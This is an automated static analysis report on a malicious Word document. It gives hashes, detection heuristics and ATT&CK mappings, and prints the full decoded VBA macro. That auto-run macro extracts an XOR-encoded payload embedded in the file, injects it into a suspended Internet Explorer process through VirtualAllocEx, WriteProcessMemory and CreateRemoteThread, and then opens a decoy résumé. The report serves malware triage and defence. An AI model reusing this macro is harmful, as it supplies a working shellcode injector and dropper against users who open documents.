Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12ffb4fa21e7a363…

MALICIOUS

Office (OLE)

423.5 KB Created: 2019-02-20 18:32:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 1a3ef9280f03679c01f15a4701363fb6 SHA-1: b9668cec4ab0bbd3c1f081ed045d13596817d5f8 SHA-256: 12ffb4fa21e7a363ad7f36f5f3d91dd13a56b738b0a460f1187818a2aec5cce2
508 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample is a malicious Microsoft Word document that leverages CVE-2007-3899 to achieve arbitrary code execution. The VBA macro contains calls to WinAPI functions such as CreateRemoteThread, VirtualAllocEx, and WriteProcessMemory, indicating it's designed to inject and run shellcode. The presence of these API calls and the specific CVE exploit strongly suggest a client-side execution attack.

Heuristics 16

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Macro.Injection-6355574-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • XOR-encoded strings (key 0x5A) critical SC_XOR_ENCODED
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x5A: 'ADVAPI32.DLL'
    Disassembly
    Attempted x86 opcode disassembly
    0003C635  1b1e              sbb ebx, dword ptr [esi]
0003C637  0c1b              or al, 0x1b
0003C639  0a13              or dl, byte ptr [ebx]
0003C63B  6968741e16165a    imul ebp, dword ptr [eax + 0x74], 0x5a16161e
0003C642  5a                pop edx
0003C643  5a                pop edx
0003C644  5a                pop edx
0003C645  3939              cmp dword ptr [ecx], edi
0003C647  295a0f            sub dword ptr [edx + 0xf], ebx
0003C64A  0e                push cs
0003C64B  1c77              sbb al, 0x77
0003C64D  625a5a            bound ebx, qword ptr [edx + 0x5a]
0003C650  5a                pop edx
0003C651  0f0e              femms
0003C653  1c77              sbb al, 0x77
0003C655  6b6c161f5a        imul ebp, dword ptr [esi + edx + 0x1f], 0x5a
0003C65A  5a                pop edx
0003C65B  5a                pop edx
0003C65C  5a                pop edx
0003C65D  0f1413            unpcklps xmm2, xmmword ptr [ebx]
0003C660  19151e1f5a1d      sbb dword ptr [0x1d5a1f1e], edx
0003C666  3f                aas
0003C667  2e0a28            or ch, byte ptr cs:[eax]
0003C66A  35393f2929        xor eax, 0x29293f39
0003C66F  0d33343e35        or eax, 0x353e3433
0003C674  2d092e3b2e        sub eax, 0x2e3b2e09
0003C679  3335345a1d3f      xor esi, dword ptr [0x3f1d5a34]
0003C67F  2e0f293f          movaps xmmword ptr cs:[edi], xmm7
0003C683  281538303f39      sub byte ptr [0x393f3038], dl
0003C689  2e13343c          adc esi, dword ptr cs:[esp + edi]
0003C68D  3528373b2e        xor eax, 0x2e3b3728
0003C692  33                .byte 0x33
0003C693  35                .byte 0x35
0003C694  34                .byte 0x34
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      Dim AJrHxoPdvR
  Set AJrHxoPdvR = CreateObject("ADODB.Stream")
  AJrHxoPdvR.Type = NRIiiFrAlf
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    VDxLHmMTIbel
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
    VDxLHmMTIbel
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        If Len(Environ("ProgramW6432")) > 0 Then
        nZFigtwuGbdD = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9300 bytes
SHA-256: 3aa52b0661b024835cfabae0c4abec7015b47dceb782e337975332aac8096bdc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
87 of 148 identifiers look randomly generated (e.g. 'TDrhCQJnrifCqxr') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const NRIiiFrAlf = 1
Const BqqNhNUcmf = 1, rEBKXSqcKr = 2, vQgegehNfg = 8

Private Type gTdpBrvrhSQZ
    NMcENjMFkRSO As Long
    OCmJmXLoqHrW As Long
    llivmFMqqlLI As Long
    AwUTBZgtzTLq As Long
End Type

Private Type qbXAWjkAEfgV
    STHpQermPhOq As Long
    DmMduZYAaJZQ As String
    XxzIYuAKnJVz As String
    cDVJPwMVTDrv As String
    JPopwcIkpOyX As Long
    dxcmTnzRgvST As Long
    zoRvXTaWEnio As Long
    LvzlCVrVbOpk As Long
    XlrUHRCPFYSZ As Long
    AMuGsfcnQyUU As Long
    TfvJbwmnaQuR As Long
    IRzAhJZUznuP As Long
    tzgDyFJtfOEd As Integer
    WoRDMgqAxWQW As Integer
    nqlkwbZgeyBq As Long
    aggsNIAhSOdW As Long
    IXVFlmllIEIa As Long
    yxmnkVWPpQUG As Long
End Type

#If VBA7 Then
    Private Declare PtrSafe Function OseHhJMQLqkE Lib "kernel32" Alias "CreateRemoteThread" (ByVal NMcENjMFkRSO As Long, ByVal fwfKqUhjeFFB As Long, ByVal YEmrfuUoNdfX As Long, ByVal IUezTJMJPbuW As LongPtr, HsgcuvjvFqnm As Long, ByVal muBCecVWSNNm As Long, YXhMgrppYHHQ As Long) As LongPtr
    Private Declare PtrSafe Function oNeBkhkTruoY Lib "kernel32" Alias "VirtualAllocEx" (ByVal NMcENjMFkRSO As Long, ByVal SZEJYLkvBxje As Long, ByVal okoASmEaVjSH As Long, ByVal UlWATCgZYUxS As Long, ByVal uQfrJECmljBM As Long) As LongPtr
    Private Declare PtrSafe Function ZqiGvZGgOSNR Lib "kernel32" Alias "WriteProcessMemory" (ByVal NMcENjMFkRSO As Long, ByVal ZqyucEzXWPoP As LongPtr, ByRef YUiRyoCVhtSY As Any, ByVal sqLPlyqerqME As Long, ByVal poujdaJfLxyX As LongPtr) As LongPtr
    Private Declare PtrSafe Function WbtuVpnlDsVo Lib "kernel32" Alias "CreateProcessA" (ByVal VMFUlnPVjaxU As String, ByVal oBddFYysREmv As String, HDjIUifgzuqD As Any, fwfKqUhjeFFB As Any, ByVal fgIEpFJUJebx As Long, ByVal muBCecVWSNNm As Long, FhKMJbTWkPSE As Any, ByVal XErBjdKAytYR As String, sZzkZGuamkCC As qbXAWjkAEfgV, pCvFeAUkNNyP As gTdpBrvrhSQZ) As Long
#Else
    Private Declare Function OseHhJMQLqkE Lib "kernel32" Alias "CreateRemoteThread" (ByVal NMcENjMFkRSO As Long, ByVal fwfKqUhjeFFB As Long, ByVal YEmrfuUoNdfX As Long, ByVal IUezTJMJPbuW As Long, HsgcuvjvFqnm As Long, ByVal muBCecVWSNNm As Long, YXhMgrppYHHQ As Long) As Long
    Private Declare Function oNeBkhkTruoY Lib "kernel32" Alias "VirtualAllocEx" (ByVal NMcENjMFkRSO As Long, ByVal SZEJYLkvBxje As Long, ByVal okoASmEaVjSH As Long, ByVal UlWATCgZYUxS As Long, ByVal uQfrJECmljBM As Long) As Long
    Private Declare Function ZqiGvZGgOSNR Lib "kernel32" Alias "WriteProcessMemory" (ByVal NMcENjMFkRSO As Long, ByVal ZqyucEzXWPoP As Long, ByRef YUiRyoCVhtSY As Any, ByVal sqLPlyqerqME As Long, ByVal poujdaJfLxyX As Long) As Long
    Private Declare Function WbtuVpnlDsVo Lib "kernel32" Alias "CreateProcessA" (ByVal VMFUlnPVjaxU As String, ByVal oBddFYysREmv As String, HDjIUifgzuqD As Any, fwfKqUhjeFFB As Any, ByVal fgIEpFJUJebx As Long, ByVal muBCecVWSNNm As Long, FhKMJbTWkPSE As Any, ByVal lpCurrentDriectory As String, sZzkZGuamkCC As qbXAWjkAEfgV, pCvFeAUkNNyP As gTdpBrvrhSQZ) As Long
#End If

Sub VDxLHmMTIbel()
    Dim BnoNNMaijKfg As Long, GxCztMkhlMLu As Variant, JeftPgmFKpOh As Long
    Dim YDZDkZlUpgWJ As gTdpBrvrhSQZ
    Dim bhfLHIGRcwXX As qbXAWjkAEfgV
    Dim JlEnfwrhmGkc As String
    Dim nZFigtwuGbdD As String
    Dim KuXLZDAZgl As String
    Dim NGLgwOfHBv() As Byte
    Dim dHhZOVoVCs As Boolean
    
#If VBA7 Then
    Dim KHgyNwkPiBDc As LongPtr, TgCxHHgYnHWt As LongPtr
#Else
    Dim KHgyNwkPiBDc As Long, TgCxHHgYnHWt As Long
#End If
    GxCztMkhlMLu = lbderjmx

    If Len(Environ("ProgramW6432")) > 0 Then
        nZFigtwuGbdD = Environ("PROGRAMFILES(X86)") & "\internet explorer\iexplore.exe"
    Else
        nZFigtwuGbdD = Environ("PROGRAMFILES") & "\internet explorer\iexplore.exe"
    End If

    TgCxHHgYnHWt = WbtuVpnlDsVo(JlEnfwrhmGkc, nZFigtwuGbdD, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, JlEnfwrhmGkc, bhfLHIGRcwXX, YDZDkZlUpgWJ)

    KHgyNwkPiBDc = oNeBkhkTruoY(YDZDkZlUpgWJ.NMcENjMFkRSO, 0, UBound(GxCztMkhlMLu), &H1000, &H40)
    For JeftPgmFKpOh = LBound(GxCztMkhlMLu) To UBound(GxCztMkhlMLu)
        BnoNNMaijKfg = GxCztMkhlMLu(JeftPgmFKpOh)
        TgCxHHgYnHWt = ZqiGvZGgOSNR(YDZDkZlUpgWJ.NMcENjMFkRSO, KHgyNwkPiBDc + JeftPgmFKpOh, BnoNNMaijKfg, 1, ByVal 0&)
    Next JeftPgmFKpOh
    TgCxHHgYnHWt = OseHhJMQLqkE(YDZDkZlUpgWJ.NMcENjMFkRSO, 0, 0, KHgyNwkPiBDc, 0, 0, 0)
    
    KuXLZDAZgl = Environ("TEMP") & "\Resume (1).doc"
    NGLgwOfHBv = dvmmoouq
    dHhZOVoVCs = vSfONPrzzr(KuXLZDAZgl, NGLgwOfHBv)
    
    Set temp = ActiveDocument
    Documents.Open (KuXLZDAZgl)
    temp.Close SaveChanges:=wdDoNotSaveChanges
End Sub

Function vSfONPrzzr(NygUAaOqfK, YsxbZZEgtK)
  Dim AJrHxoPdvR
  Set AJrHxoPdvR = CreateObject("ADODB.Stream")
  AJrHxoPdvR.Type = NRIiiFrAlf

  AJrHxoPdvR.Open
  AJrHxoPdvR.Write YsxbZZEgtK

  AJrHxoPdvR.SaveToFile NygUAaOqfK, rEBKXSqcKr
End Function

Sub AutoOpen()
    VDxLHmMTIbel
End Sub
Sub Workbook_Open()
    VDxLHmMTIbel
End Sub


Function lbderjmx() As Byte()
    Dim ZVIoJfIFaGSIfOE() As Byte
    Dim TFZYXEeUZlmopzP As Long
    Dim HUiXuSHstkHhHjb(7) As Byte
    Dim JeftPgmFKpOh As Long
    Dim TDrhCQJnrifCqxr() As Byte
    Dim dHhZOVoVCs As Boolean
    
    ZVIoJfIFaGSIfOE = PtDMAOUBaA(ActiveDocument.FullName)
    TFZYXEeUZlmopzP = xOwxkhxtfK(ZVIoJfIFaGSIfOE)
    
    
        HUiXuSHstkHhHjb(0) = 50
    
        HUiXuSHstkHhHjb(1) = 50
    
        HUiXuSHstkHhHjb(2) = 48
    
        HUiXuSHstkHhHjb(3) = 74
    
        HUiXuSHstkHhHjb(4) = 85
    
        HUiXuSHstkHhHjb(5) = 80
    
        HUiXuSHstkHhHjb(6) = 80
    
        HUiXuSHstkHhHjb(7) = 67

    
    JeftPgmFKpOh = myxPEnEznm(ZVIoJfIFaGSIfOE, HUiXuSHstkHhHjb)
    TDrhCQJnrifCqxr = hUOHYwtiAP(ZVIoJfIFaGSIfOE, JeftPgmFKpOh + xOwxkhxtfK(HUiXuSHstkHhHjb), 212481 - 1)
    dHhZOVoVCs = lenXkJRwCo(TDrhCQJnrifCqxr, xOwxkhxtfK(TDrhCQJnrifCqxr))
    
    lbderjmx = TDrhCQJnrifCqxr
End Function

Function dvmmoouq() As Byte()
    Dim ZVIoJfIFaGSIfOE() As Byte
    Dim TFZYXEeUZlmopzP As Long
    Dim HUiXuSHstkHhHjb(7) As Byte
    Dim JeftPgmFKpOh As Long
    Dim TDrhCQJnrifCqxr() As Byte
    Dim dHhZOVoVCs As Boolean
    
    ZVIoJfIFaGSIfOE = PtDMAOUBaA(ActiveDocument.FullName)
    TFZYXEeUZlmopzP = xOwxkhxtfK(ZVIoJfIFaGSIfOE)
    
    
        HUiXuSHstkHhHjb(0) = 77
    
        HUiXuSHstkHhHjb(1) = 86
    
        HUiXuSHstkHhHjb(2) = 67
    
        HUiXuSHstkHhHjb(3) = 71
    
        HUiXuSHstkHhHjb(4) = 84
    
        HUiXuSHstkHhHjb(5) = 77
    
        HUiXuSHstkHhHjb(6) = 78
    
        HUiXuSHstkHhHjb(7) = 89

    
    JeftPgmFKpOh = myxPEnEznm(ZVIoJfIFaGSIfOE, HUiXuSHstkHhHjb)
    TDrhCQJnrifCqxr = hUOHYwtiAP(ZVIoJfIFaGSIfOE, JeftPgmFKpOh + xOwxkhxtfK(HUiXuSHstkHhHjb), 90842 - 1)
    dHhZOVoVCs = lenXkJRwCo(TDrhCQJnrifCqxr, xOwxkhxtfK(TDrhCQJnrifCqxr))
    
    dvmmoouq = TDrhCQJnrifCqxr
End Function

Function xOwxkhxtfK(abArray() As Byte) As Long
    Dim nLen As Long
    xOwxkhxtfK = UBound(abArray) - LBound(abArray) + 1
End Function

Function PtDMAOUBaA(AgBWmTlLLC As String)
    Dim eIAQcGBWHj() As Byte
    Dim PkIVoZuMej As Integer: PkIVoZuMej = FreeFile
    
    Open AgBWmTlLLC For Binary Access Read As #PkIVoZuMej
    ReDim eIAQcGBWHj(0 To LOF(PkIVoZuMej) - 1)
    Get #PkIVoZuMej, , eIAQcGBWHj
    Close #PkIVoZuMej
    
    PtDMAOUBaA = eIAQcGBWHj
End Function

Function myxPEnEznm(gtbBYyanTB() As Byte, iWKjItTzLF() As Byte) As Long
    Dim fSqoSTMdTb As Boolean
    Dim kGEmWdgIkt As Long
    Dim aEuGjhzCkT As Long
    Dim fOTwAmhgxY As Long
    Dim XyPBNBKplC As Long
    
    fSqoSTMdTb = False
    fOTwAmhgxY = xOwxkhxtfK(gtbBYyanTB)
    XyPBNBKplC = xOwxkhxtfK(iWKjItTzLF)
    For kGEmWdgIkt = 0 To fOTwAmhgxY
        fSqoSTMdTb = True
        For aEuGjhzCkT = 0 To XyPBNBKplC - 1
                If gtbBYyanTB(kGEmWdgIkt + aEuGjhzCkT) <> iWKjItTzLF(aEuGjhzCkT) Then
                    fSqoSTMdTb = False
                    Exit For
                End If
        Next aEuGjhzCkT
        If fSqoSTMdTb = True Then
            Exit For
        End If
    Next kGEmWdgIkt
    
    If fSqoSTMdTb = False Then
        myxPEnEznm = -1
    Else
        myxPEnEznm = kGEmWdgIkt
    End If
    
End Function

Function hUOHYwtiAP(gtbBYyanTB() As Byte, jEsGhhVMxM As Long, doVCDICsGw As Long) As Byte()
    Dim rvtitxUTyD() As Byte
    Dim kGEmWdgIkt As Long

    For kGEmWdgIkt = 0 To doVCDICsGw
        ReDim Preserve rvtitxUTyD(kGEmWdgIkt)
        rvtitxUTyD(kGEmWdgIkt) = gtbBYyanTB(jEsGhhVMxM + kGEmWdgIkt)
    Next kGEmWdgIkt
    
    hUOHYwtiAP = rvtitxUTyD
End Function

Function lenXkJRwCo(SmsKmaCfMx() As Byte, doVCDICsGw As Long)
    
    Dim zYUrlwVwjj As Byte
    Dim wVRMdzFPQx As Long
    zYUrlwVwjj = 90
    
    For wVRMdzFPQx = 0 To doVCDICsGw - 1
        SmsKmaCfMx(wVRMdzFPQx) = SmsKmaCfMx(wVRMdzFPQx) Xor zYUrlwVwjj
    Next wVRMdzFPQx
    
End Function
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1612163912/Ole10Native 91316 bytes
SHA-256: 9b90717be31e6d1a6df95b41aede092591a91822ed4739b975f274a8ad5a51de
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.92, consistent with packed or encrypted content.
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_1612163913/Ole10Native 212955 bytes
SHA-256: 9750264e1b3a8771460a1795cd40f8a237c288350c2bd77900dbf8a8b93f29ea

Open this report in the interactive analyzer, or submit your own file for analysis.